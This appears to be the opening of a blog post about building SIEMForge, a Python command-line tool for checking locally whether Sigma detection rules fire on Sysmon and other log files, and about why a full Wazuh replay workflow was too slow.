I'd written a few Sigma rules for my home lab and wanted to know if they actually fired on real Sysmon events. The standard answer is "deploy to Wazuh and replay logs". That's a lot of overhead when I just want to confirm a regex matches. So I built SIEMForge. It's a Python CLI that loads Sigma YAML files, parses the detection logic, and matches it against JSON, JSONL, syslog, or CSV log files locally. No SIEM required. This post is the messy version of how it came together. The final code is on GitHub at github.com/TiltedLunar123/SIEMForge. The problem I had ten Sigma rules covering things like LSASS dumps, suspicious PowerShell, and registry persistence. To validate them I'd been: starting Wazuh in a VM shipping a Sysmon JSONL via filebeat SSHing to the manager and tailing alerts.log realizing the rule didn't fire because I had a typo in the field name Round trip on a single rule edit was about 4 minutes. For ten rules iterating through false positive checks, the math gets bad.…